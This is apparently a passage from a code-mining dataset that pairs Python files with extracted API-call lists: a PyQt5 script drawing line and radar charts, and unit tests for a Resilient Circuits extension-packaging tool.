[((3599, 3662), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (3609, 3662), False, 'import cv2\n'), ((3767, 3830), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (3777, 3830), False, 'import cv2\n'), ((1577, 1594), 'Utilities.Writer', 'Writer', (['file_name'], {}), '(file_name)\n', (1583, 1594), False, 'from Utilities import Writer\n'), ((1610, 1635), 'os.path.isfile', 'os.path.isfile', (['file_name'], {}), '(file_name)\n', (1624, 1635), False, 'import os\n'), ((1644, 1664), 'os.remove', 'os.remove', (['file_name'], {}), '(file_name)\n', (1653, 1664), False, 'import os\n'), ((1879, 1896), 'Utilities.Writer', 'Writer', (['file_name'], {}), '(file_name)\n', (1885, 1896), False, 'from Utilities import Writer\n'), ((1912, 1937), 'os.path.isfile', 'os.path.isfile', (['file_name'], {}), '(file_name)\n', (1926, 1937), False, 'import os\n'), ((2060, 2076), 'csv.reader', 'csv.reader', (['file'], {}), '(file)\n', (2070, 2076), False, 'import csv\n'), ((2175, 2195), 'os.remove', 'os.remove', (['file_name'], {}), '(file_name)\n', (2184, 2195), False, 'import os\n'), ((1714, 1736), 'pytest.raises', 'pytest.raises', (['OSError'], {}), '(OSError)\n', (1727, 1736), False, 'import pytest\n'), ((1750, 1777), 'Utilities.Writer', 'Writer', (['"""&?akjhdsfksdf.csv"""'], {}), "('&?akjhdsfksdf.csv')\n", (1756, 1777), False, 'from Utilities import Writer\n'), ((2316, 2379), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (2326, 2379), False, 'import cv2\n'), ((2535, 2598), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (2545, 2598), False, 'import cv2\n'), 
((2755, 2818), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (2765, 2818), False, 'import cv2\n'), ((2976, 3039), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (2986, 3039), False, 'import cv2\n'), ((3200, 3263), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (3210, 3263), False, 'import cv2\n'), ((3426, 3489), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (3436, 3489), False, 'import cv2\n'), ((3693, 3721), 'Processing.GaussianNoise.GaussianNoise.process', 'GaussianNoise.process', (['image'], {}), '(image)\n', (3714, 3721), False, 'from Processing.GaussianNoise import GaussianNoise\n'), ((3870, 3922), 'Processing.Processing.process_image', 'Processing.process_image', (['"""../images/buffer/new.png"""'], {}), "('../images/buffer/new.png')\n", (3894, 3922), False, 'from Processing import Processing\n'), ((404, 417), 'Main.Application', 'Application', ([], {}), '()\n', (415, 417), False, 'from Main import Application\n'), ((486, 499), 'Main.Application', 'Application', ([], {}), '()\n', (497, 499), False, 'from Main import Application\n'), ((1003, 1016), 'Main.Application', 'Application', ([], {}), '()\n', (1014, 1016), False, 'from Main import Application\n'), ((1100, 1113), 'Main.Application', 'Application', ([], {}), '()\n', (1111, 1113), False, 'from Main import Application\n'), ((323, 336), 'Main.Application', 'Application', ([], {}), '()\n', (334, 336), False, 'from Main import Application\n'), ((575, 588), 'Main.Application', 'Application', ([], {}), '()\n', (586, 588), False, 'from Main import Application\n'), ((671, 684), 
'Main.Application', 'Application', ([], {}), '()\n', (682, 684), False, 'from Main import Application\n'), ((769, 782), 'Main.Application', 'Application', ([], {}), '()\n', (780, 782), False, 'from Main import Application\n'), ((909, 922), 'Main.Application', 'Application', ([], {}), '()\n', (920, 922), False, 'from Main import Application\n'), ((1204, 1217), 'Main.Application', 'Application', ([], {}), '()\n', (1215, 1217), False, 'from Main import Application\n'), ((1315, 1328), 'Main.Application', 'Application', ([], {}), '()\n', (1326, 1328), False, 'from Main import Application\n'), ((1413, 1426), 'Main.Application', 'Application', ([], {}), '()\n', (1424, 1426), False, 'from Main import Application\n')]
|
#!/usr/bin/env python
import sys
import scipy
from PyQt5 import QtCore, QtGui, QtWidgets, uic
from PyQt5.QtCore import Qt
# Constants
BLACK = QtGui.QColor('black')
WHITE = QtGui.QColor('white')
G_FONT = QtGui.QFont('Times New Roman', 16, 75)
PEN = QtGui.QPen(BLACK)
BLACK_BRUSH = QtGui.QBrush(BLACK, Qt.SolidPattern)
WHITE_BRUSH = QtGui.QBrush(WHITE, Qt.SolidPattern)
DASH_PEN = QtGui.QPen(BLACK_BRUSH, 1, Qt.DashLine)
DOT_PEN = QtGui.QPen(BLACK_BRUSH, 1, Qt.DotLine)
# Window
app = QtWidgets.QApplication(sys.argv)
window = QtWidgets.QMainWindow()
uic.loadUi('view.ui', window)
with open('view.css', 'r') as css:
app.setStyleSheet(css.read().replace('\n', ''))
def altitude_list():
model = QtCore.QStringListModel(
[str(a) for a in [0, 25, 50, 75, 100,
150, 200, 250,
300, 400, 500, 600, 700]])
window.altitudeList.setModel(model)
# Data items
f = scipy.vectorize(lambda t: (t - 120) * (t - 120) / 120)
g = scipy.vectorize(lambda t: (t - 160) * (t - 160) / 120 - 300)
ts = scipy.random.randint(120, 300, 10)
xs = f(ts) + (scipy.random.randn(len(ts)) - 0.5) * 3
ys = g(ts) + (scipy.random.randn(len(ts)) - 0.5) * 3
# The central graphics view
main_chart = window.lineChart
def draw_central_graphics():
scene = QtWidgets.QGraphicsScene(main_chart)
main_chart.setScene(scene)
def text(label, *args):
scene.addText(label, G_FONT).setPos(*args)
def line(*args):
scene.addLine(*args)
def dot(x, y, *args):
scene.addEllipse(x-5, y-5, 10, 10, *args)
# Axes
text('S', -60, 0)
text('N', 330, 0)
text('W Up', 0, -330)
text('E Down', 0, 330)
text('Div.= 2.0e-03', 100, 330)
# Ticks
line(0, 310, 0, -310)
for y in scipy.arange(-300, 310, 60): line(-3, y, 3, y)
line(-20, 0, 310, 0)
for x in scipy.arange(0, 310, 60): line(x, 3, x, -3)
# Curves
p = QtGui.QPainterPath(QtCore.QPoint(120, f(120)))
for x in range(120, 300): p.lineTo(x, f(x))
scene.addPath(p)
p = QtGui.QPainterPath(QtCore.QPoint(120, g(120)))
for x in range(120, 360, 10): p.lineTo(x, g(x))
scene.addPath(p, DASH_PEN)
# Data items
for t, x, y in zip(ts, xs, ys):
dot(t, x, BLACK, BLACK_BRUSH)
dot(t, y, BLACK, WHITE_BRUSH)
radar = window.radarChart
def draw_radar_chart():
scene = QtWidgets.QGraphicsScene(radar)
radar.setScene(scene)
# Rulers
scene.addLine(-300, 0, -294, 0)
scene.addLine(+300, 0, +294, 0)
scene.addLine(0, -300, 0, -294)
scene.addLine(0, +300, 0, +294)
scene.addLine(-10, 0, 10, 0)
scene.addLine(0, -10, 0, 10)
scene.addEllipse(-300, -300, 600, 600, BLACK)
# Data items
for x, y in zip(xs, ys):
scene.addEllipse(x, y, 10, 10, BLACK, BLACK_BRUSH)
altitude_list()
draw_central_graphics()
draw_radar_chart()
window.show()
app.exec()
|
[
"scipy.arange",
"scipy.vectorize",
"PyQt5.QtGui.QColor",
"PyQt5.QtWidgets.QMainWindow",
"scipy.random.randint",
"PyQt5.QtGui.QFont",
"PyQt5.uic.loadUi",
"PyQt5.QtGui.QPen",
"PyQt5.QtGui.QBrush",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QGraphicsScene"
] |
[((147, 168), 'PyQt5.QtGui.QColor', 'QtGui.QColor', (['"""black"""'], {}), "('black')\n", (159, 168), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((177, 198), 'PyQt5.QtGui.QColor', 'QtGui.QColor', (['"""white"""'], {}), "('white')\n", (189, 198), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((208, 246), 'PyQt5.QtGui.QFont', 'QtGui.QFont', (['"""Times New Roman"""', '(16)', '(75)'], {}), "('Times New Roman', 16, 75)\n", (219, 246), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((253, 270), 'PyQt5.QtGui.QPen', 'QtGui.QPen', (['BLACK'], {}), '(BLACK)\n', (263, 270), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((285, 321), 'PyQt5.QtGui.QBrush', 'QtGui.QBrush', (['BLACK', 'Qt.SolidPattern'], {}), '(BLACK, Qt.SolidPattern)\n', (297, 321), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((336, 372), 'PyQt5.QtGui.QBrush', 'QtGui.QBrush', (['WHITE', 'Qt.SolidPattern'], {}), '(WHITE, Qt.SolidPattern)\n', (348, 372), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((384, 423), 'PyQt5.QtGui.QPen', 'QtGui.QPen', (['BLACK_BRUSH', '(1)', 'Qt.DashLine'], {}), '(BLACK_BRUSH, 1, Qt.DashLine)\n', (394, 423), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((434, 472), 'PyQt5.QtGui.QPen', 'QtGui.QPen', (['BLACK_BRUSH', '(1)', 'Qt.DotLine'], {}), '(BLACK_BRUSH, 1, Qt.DotLine)\n', (444, 472), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((490, 522), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (512, 522), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((532, 555), 'PyQt5.QtWidgets.QMainWindow', 'QtWidgets.QMainWindow', ([], {}), '()\n', (553, 555), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((556, 585), 'PyQt5.uic.loadUi', 'uic.loadUi', (['"""view.ui"""', 'window'], {}), "('view.ui', window)\n", (566, 585), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((931, 985), 
'scipy.vectorize', 'scipy.vectorize', (['(lambda t: (t - 120) * (t - 120) / 120)'], {}), '(lambda t: (t - 120) * (t - 120) / 120)\n', (946, 985), False, 'import scipy\n'), ((990, 1050), 'scipy.vectorize', 'scipy.vectorize', (['(lambda t: (t - 160) * (t - 160) / 120 - 300)'], {}), '(lambda t: (t - 160) * (t - 160) / 120 - 300)\n', (1005, 1050), False, 'import scipy\n'), ((1057, 1091), 'scipy.random.randint', 'scipy.random.randint', (['(120)', '(300)', '(10)'], {}), '(120, 300, 10)\n', (1077, 1091), False, 'import scipy\n'), ((1300, 1336), 'PyQt5.QtWidgets.QGraphicsScene', 'QtWidgets.QGraphicsScene', (['main_chart'], {}), '(main_chart)\n', (1324, 1336), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((1769, 1796), 'scipy.arange', 'scipy.arange', (['(-300)', '(310)', '(60)'], {}), '(-300, 310, 60)\n', (1781, 1796), False, 'import scipy\n'), ((1854, 1878), 'scipy.arange', 'scipy.arange', (['(0)', '(310)', '(60)'], {}), '(0, 310, 60)\n', (1866, 1878), False, 'import scipy\n'), ((2365, 2396), 'PyQt5.QtWidgets.QGraphicsScene', 'QtWidgets.QGraphicsScene', (['radar'], {}), '(radar)\n', (2389, 2396), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n')]
|
import unittest
import os
import sys
import shutil
import copy
import zipfile
import json
from resilient_circuits.util.ext.ExtCreate import ExtCreate, PATH_DEFAULT_ICON_EXTENSION_LOGO, PATH_DEFAULT_ICON_COMPANY_LOGO
from resilient_circuits.util.ext import ExtException
# Import mock_data (need to add path to support relative imports in PY3)
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from ext_tests.mock_data.mock_data import MOCK_INTEGRATION_NAME, MOCK_INTEGRATION_URL, MOCK_INTEGRATION_LONG_DESCRIPTION, mock_import_definition, mock_import_definition_tagged, mock_config_str, mock_config_list, mock_setup_py_file_lines, mock_parsed_setup_py_attributes, mock_icon_extension_logo, mock_icon_company_logo, mock_message_destination_to_be_tagged, mock_message_destination_tagged, mock_extension_zip_file_structure, mock_executables_zip_file_structure
path_this_dir = os.path.dirname(os.path.realpath(__file__))
path_temp_test_dir = os.path.join(path_this_dir, "test_temp")
path_fn_mock_integration = os.path.join(path_this_dir, "mock_data", "fn_mock_integration")
path_mock_setup_py_file = os.path.join(path_fn_mock_integration, "setup.py")
path_mock_customize_py_file = os.path.join(path_fn_mock_integration, "fn_mock_integration", "util", "customize.py")
path_mock_config_py_file = os.path.join(path_fn_mock_integration, "fn_mock_integration", "util", "config.py")
path_mock_bd_true_tar = os.path.join(path_this_dir, "mock_data", "built_distributions", "true_tar_fn_mock_integration-1.0.0.tar.gz")
path_mock_bd_true_zip = os.path.join(path_this_dir, "mock_data", "built_distributions", "true_zip_fn_mock_integration-1.0.0.zip")
path_mock_bd_zipped_tar = os.path.join(path_this_dir, "mock_data", "built_distributions", "zipped_tar_fn_mock_integration-1.0.0.zip")
path_mock_export_res = os.path.join(path_this_dir, "mock_data", "ext-fn_mock_integration-1.0.0", "export.res")
path_mock_extension_json = os.path.join(path_this_dir, "mock_data", "ext-fn_mock_integration-1.0.0", "extension.json")
path_mock_exectuable_json = os.path.join(path_this_dir, "mock_data", "ext-fn_mock_integration-1.0.0", "executables", "executable.json")
def get_dict_from_json_file(file_path):
dict_to_return = {}
with open(file_path, 'r') as the_file:
dict_to_return = json.load(the_file)
return dict_to_return
class ExtCreateClassTestIndividualFns(unittest.TestCase):
maxDiff = None
def setUp(self):
# assertRaisesRegexp renamed to assertRaisesRegex in PY3.2
if sys.version_info < (3, 2):
self.assertRaisesRegex = self.assertRaisesRegexp
self.ext_create_class = ExtCreate("ext:package")
self.original_import_definition = copy.deepcopy(mock_import_definition)
self.original_mock_message_destination_to_be_tagged = copy.deepcopy(mock_message_destination_to_be_tagged[0])
def tearDown(self):
# Reset mock_import_definition object
mock_import_definition.clear()
mock_import_definition.update(copy.deepcopy(self.original_import_definition))
# Reset mock_message_destination_to_be_tagged
mock_message_destination_to_be_tagged[0].clear()
mock_message_destination_to_be_tagged[0].update(copy.deepcopy(self.original_mock_message_destination_to_be_tagged))
def test_get_import_definition_from_customize_py(self):
import_definition = self.ext_create_class.__get_import_definition_from_customize_py__(path_mock_customize_py_file)
self.assertEqual(import_definition, mock_import_definition)
def test_get_configs_from_config_py(self):
the_config_str, the_config_list = self.ext_create_class.__get_configs_from_config_py__(path_mock_config_py_file)
self.assertEqual(the_config_str, mock_config_str)
self.assertEqual(the_config_list, mock_config_list)
def test_parse_setup_attribute(self):
the_parsed_name_value = self.ext_create_class.__parse_setup_attribute__(path_mock_setup_py_file, mock_setup_py_file_lines, "name")
self.assertEqual(the_parsed_name_value, MOCK_INTEGRATION_NAME)
the_parsed_url_value = self.ext_create_class.__parse_setup_attribute__(path_mock_setup_py_file, mock_setup_py_file_lines, "url")
self.assertEqual(the_parsed_url_value, MOCK_INTEGRATION_URL)
the_parsed_long_description_value = self.ext_create_class.__parse_setup_attribute__(path_mock_setup_py_file, mock_setup_py_file_lines, "long_description")
self.assertEqual(the_parsed_long_description_value, MOCK_INTEGRATION_LONG_DESCRIPTION)
def test_parse_setup_py(self):
attribute_names = self.ext_create_class.supported_setup_py_attribute_names
parsed_setup_py_attributes = self.ext_create_class.__parse_setup_py__(path_mock_setup_py_file, attribute_names)
self.assertEqual(parsed_setup_py_attributes, mock_parsed_setup_py_attributes)
def test_get_icon(self):
path_extension_logo = os.path.join(path_fn_mock_integration, "icons", "extension_logo.png")
path_company_logo = os.path.join(path_fn_mock_integration, "icons", "company_logo.png")
path_to_corrupt_jpg_icon = os.path.join(path_fn_mock_integration, "icons", "mock_corrupt_icon.jpg")
path_to_corrupt_png_icon = os.path.join(path_fn_mock_integration, "icons", "mock_corrupt_icon.png")
# Test getting extension_logo
extension_logo_as_base64 = self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), path_extension_logo, 200, 72, PATH_DEFAULT_ICON_EXTENSION_LOGO)
self.assertEqual(extension_logo_as_base64, mock_icon_extension_logo)
# Test getting default extension_logo
extension_logo_as_base64 = self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), "", 200, 72, PATH_DEFAULT_ICON_EXTENSION_LOGO)
self.assertEqual(extension_logo_as_base64, mock_icon_extension_logo)
# Test getting company_logo
company_logo_as_base64 = self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_COMPANY_LOGO), path_company_logo, 100, 100, PATH_DEFAULT_ICON_COMPANY_LOGO)
self.assertEqual(company_logo_as_base64, mock_icon_company_logo)
# Test getting default company_logo
company_logo_as_base64 = self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_COMPANY_LOGO), "", 100, 100, PATH_DEFAULT_ICON_COMPANY_LOGO)
self.assertEqual(company_logo_as_base64, mock_icon_company_logo)
# Test invalid paths
with self.assertRaisesRegex(OSError, "Could not find valid icon file. Looked at two locations:"):
self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_COMPANY_LOGO), "", 200, 72, "")
# Test not .png
with self.assertRaisesRegex(ExtException, ".jpg is not a supported icon file type. Icon file must be .png"):
self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), path_to_corrupt_jpg_icon, 10, 10, PATH_DEFAULT_ICON_EXTENSION_LOGO)
# Test corrupt .png
with self.assertRaisesRegex(ExtException, "Icon file corrupt"):
self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), path_to_corrupt_png_icon, 10, 10, PATH_DEFAULT_ICON_EXTENSION_LOGO)
# Test invalid resolution
with self.assertRaisesRegex(ExtException, "Resolution must be 10x10"):
self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), path_extension_logo, 10, 10, PATH_DEFAULT_ICON_EXTENSION_LOGO)
def test_add_tag(self):
tag_name = MOCK_INTEGRATION_NAME
# Test adding the tag
tagged_md = self.ext_create_class.__add_tag__(tag_name, mock_message_destination_to_be_tagged)
self.assertEqual(tagged_md, mock_message_destination_tagged)
# Test invalid list_of_objs
with self.assertRaisesRegex(ExtException, "is not a List"):
self.ext_create_class.__add_tag__(tag_name, "")
def test_add_tag_to_import_definition(self):
tag_name = MOCK_INTEGRATION_NAME
supported_res_obj_names = self.ext_create_class.supported_res_obj_names
tagged_import_definition = self.ext_create_class.__add_tag_to_import_definition__(tag_name, supported_res_obj_names, mock_import_definition)
self.assertEqual(tagged_import_definition, mock_import_definition_tagged)
class ExtCreateClassTestCreateExtension(unittest.TestCase):
maxDiff = None
def setUp(self):
self.ext_create_class = ExtCreate("ext:package")
# Create temp dir
os.makedirs(path_temp_test_dir)
def tearDown(self):
# Remove temp dir
shutil.rmtree(path_temp_test_dir)
def create_the_extension(self, path_built_distribution):
return self.ext_create_class.create_extension(
path_setup_py_file=path_mock_setup_py_file,
path_customize_py_file=path_mock_customize_py_file,
path_config_py_file=path_mock_config_py_file,
output_dir=path_temp_test_dir,
path_built_distribution=path_built_distribution
)
def validate_creation(self, path_the_extension_zip):
path_created_extension_zip = os.path.join(path_temp_test_dir, "ext-fn_mock_integration-1.0.0.zip")
self.assertEqual(path_the_extension_zip, path_created_extension_zip)
self.assertTrue(zipfile.is_zipfile(path_the_extension_zip))
def validate_extension_zip_folder_structure(self, path_the_extension_zip):
# Open the zip
with zipfile.ZipFile(file=path_the_extension_zip, mode="r") as zip_file:
# Get a List of all the member names
zip_file_structure = zip_file.namelist()
self.assertEqual(zip_file_structure, mock_extension_zip_file_structure)
def validate_executables_folder_structure(self, path_the_extension_zip):
# Open the extension_zip
with zipfile.ZipFile(file=path_the_extension_zip, mode="r") as the_extension_zip_file:
# Extract the executables_zip
path_the_executable_zip_file = the_extension_zip_file.extract(member="executables/exe-{0}-1.0.0.zip".format(MOCK_INTEGRATION_NAME), path=path_temp_test_dir)
# Open the executables_zip
with zipfile.ZipFile(file=path_the_executable_zip_file, mode="r") as the_executable_zip_file:
the_executable_zip_file_structure = the_executable_zip_file.namelist()
self.assertEqual(the_executable_zip_file_structure, mock_executables_zip_file_structure)
def validate_export_res_and_extension_json(self, path_the_extension_zip):
# Get the mock data
mock_export_res = get_dict_from_json_file(path_mock_export_res)
mock_extension_json = get_dict_from_json_file(path_mock_extension_json)
# Extract the zip
with zipfile.ZipFile(file=path_the_extension_zip, mode="r") as zip_file:
zip_file.extractall(path=path_temp_test_dir)
# Get the export_res and extension_json
export_res = get_dict_from_json_file(os.path.join(path_temp_test_dir, "export.res"))
extension_json = get_dict_from_json_file(os.path.join(path_temp_test_dir, "extension.json"))
# Compare
self.assertEqual(export_res, mock_export_res)
self.assertEqual(mock_extension_json, extension_json)
def validate_executable_json(self, path_the_extension_zip):
# Get the mock data
mock_executable_json = get_dict_from_json_file(path_mock_exectuable_json)
# Open the extension_zip
with zipfile.ZipFile(file=path_the_extension_zip, mode="r") as the_extension_zip_file:
# Extract the executables_zip
path_the_executable_zip_file = the_extension_zip_file.extract(member="executables/exe-{0}-1.0.0.zip".format(MOCK_INTEGRATION_NAME), path=path_temp_test_dir)
# Open the executables_zip
with zipfile.ZipFile(file=path_the_executable_zip_file, mode="r") as the_executable_zip_file:
the_executable_zip_file.extractall(path=path_temp_test_dir)
# Get the executable.json
executable_json = get_dict_from_json_file(os.path.join(path_temp_test_dir, "executable.json"))
# Compare
self.assertEqual(executable_json, mock_executable_json)
#################
# Test TRUE TAR #
#################
def test_true_tar_creation(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate creation
self.validate_creation(path_the_extension_zip)
def test_true_tar_valid_extension_zip_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate folder structure
self.validate_extension_zip_folder_structure(path_the_extension_zip)
def test_true_tar_valid_executables_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate folder structure
self.validate_executables_folder_structure(path_the_extension_zip)
def test_true_tar_valid_export_res_and_extension_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate export.res and extension.json
self.validate_export_res_and_extension_json(path_the_extension_zip)
def test_true_tar_valid_executables_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate export.res and extension.json
self.validate_executable_json(path_the_extension_zip)
#################
# Test TRUE ZIP #
#################
def test_true_zip_creation(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate creation
self.validate_creation(path_the_extension_zip)
def test_true_zip_valid_extension_zip_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate folder structure
self.validate_extension_zip_folder_structure(path_the_extension_zip)
def test_true_zip_valid_executables_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate folder structure
self.validate_executables_folder_structure(path_the_extension_zip)
def test_true_zip_valid_export_res_and_extension_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate export.res and extension.json
self.validate_export_res_and_extension_json(path_the_extension_zip)
def test_true_zip_valid_executables_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate export.res and extension.json
self.validate_executable_json(path_the_extension_zip)
###################
# Test ZIPPED TAR #
###################
def test_zipped_tar_creation(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate creation
self.validate_creation(path_the_extension_zip)
def test_zipped_tar_valid_extension_zip_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate folder structure
self.validate_extension_zip_folder_structure(path_the_extension_zip)
def test_zipped_tar_valid_executables_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate folder structure
self.validate_executables_folder_structure(path_the_extension_zip)
def test_zipped_tar_valid_export_res_and_extension_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate export.res and extension.json
self.validate_export_res_and_extension_json(path_the_extension_zip)
def test_zipped_tar_valid_executables_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate export.res and extension.json
self.validate_executable_json(path_the_extension_zip)
|
[
"zipfile.is_zipfile",
"copy.deepcopy",
"json.load",
"resilient_circuits.util.ext.ExtCreate.ExtCreate",
"os.makedirs",
"os.path.abspath",
"os.path.basename",
"zipfile.ZipFile",
"ext_tests.mock_data.mock_data.mock_import_definition.clear",
"os.path.realpath",
"shutil.rmtree",
"os.path.join"
] |
[((969, 1009), 'os.path.join', 'os.path.join', (['path_this_dir', '"""test_temp"""'], {}), "(path_this_dir, 'test_temp')\n", (981, 1009), False, 'import os\n'), ((1037, 1100), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""fn_mock_integration"""'], {}), "(path_this_dir, 'mock_data', 'fn_mock_integration')\n", (1049, 1100), False, 'import os\n'), ((1127, 1177), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""setup.py"""'], {}), "(path_fn_mock_integration, 'setup.py')\n", (1139, 1177), False, 'import os\n'), ((1208, 1297), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""fn_mock_integration"""', '"""util"""', '"""customize.py"""'], {}), "(path_fn_mock_integration, 'fn_mock_integration', 'util',\n 'customize.py')\n", (1220, 1297), False, 'import os\n'), ((1321, 1407), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""fn_mock_integration"""', '"""util"""', '"""config.py"""'], {}), "(path_fn_mock_integration, 'fn_mock_integration', 'util',\n 'config.py')\n", (1333, 1407), False, 'import os\n'), ((1428, 1540), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""built_distributions"""', '"""true_tar_fn_mock_integration-1.0.0.tar.gz"""'], {}), "(path_this_dir, 'mock_data', 'built_distributions',\n 'true_tar_fn_mock_integration-1.0.0.tar.gz')\n", (1440, 1540), False, 'import os\n'), ((1561, 1670), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""built_distributions"""', '"""true_zip_fn_mock_integration-1.0.0.zip"""'], {}), "(path_this_dir, 'mock_data', 'built_distributions',\n 'true_zip_fn_mock_integration-1.0.0.zip')\n", (1573, 1670), False, 'import os\n'), ((1693, 1804), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""built_distributions"""', '"""zipped_tar_fn_mock_integration-1.0.0.zip"""'], {}), "(path_this_dir, 'mock_data', 'built_distributions',\n 'zipped_tar_fn_mock_integration-1.0.0.zip')\n", (1705, 1804), False, 
'import os\n'), ((1825, 1916), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""ext-fn_mock_integration-1.0.0"""', '"""export.res"""'], {}), "(path_this_dir, 'mock_data', 'ext-fn_mock_integration-1.0.0',\n 'export.res')\n", (1837, 1916), False, 'import os\n'), ((1940, 2035), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""ext-fn_mock_integration-1.0.0"""', '"""extension.json"""'], {}), "(path_this_dir, 'mock_data', 'ext-fn_mock_integration-1.0.0',\n 'extension.json')\n", (1952, 2035), False, 'import os\n'), ((2060, 2171), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""ext-fn_mock_integration-1.0.0"""', '"""executables"""', '"""executable.json"""'], {}), "(path_this_dir, 'mock_data', 'ext-fn_mock_integration-1.0.0',\n 'executables', 'executable.json')\n", (2072, 2171), False, 'import os\n'), ((920, 946), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (936, 946), False, 'import os\n'), ((2306, 2325), 'json.load', 'json.load', (['the_file'], {}), '(the_file)\n', (2315, 2325), False, 'import json\n'), ((2653, 2677), 'resilient_circuits.util.ext.ExtCreate.ExtCreate', 'ExtCreate', (['"""ext:package"""'], {}), "('ext:package')\n", (2662, 2677), False, 'from resilient_circuits.util.ext.ExtCreate import ExtCreate, PATH_DEFAULT_ICON_EXTENSION_LOGO, PATH_DEFAULT_ICON_COMPANY_LOGO\n'), ((2720, 2757), 'copy.deepcopy', 'copy.deepcopy', (['mock_import_definition'], {}), '(mock_import_definition)\n', (2733, 2757), False, 'import copy\n'), ((2820, 2875), 'copy.deepcopy', 'copy.deepcopy', (['mock_message_destination_to_be_tagged[0]'], {}), '(mock_message_destination_to_be_tagged[0])\n', (2833, 2875), False, 'import copy\n'), ((2955, 2985), 'ext_tests.mock_data.mock_data.mock_import_definition.clear', 'mock_import_definition.clear', ([], {}), '()\n', (2983, 2985), False, 'from ext_tests.mock_data.mock_data import MOCK_INTEGRATION_NAME, MOCK_INTEGRATION_URL, 
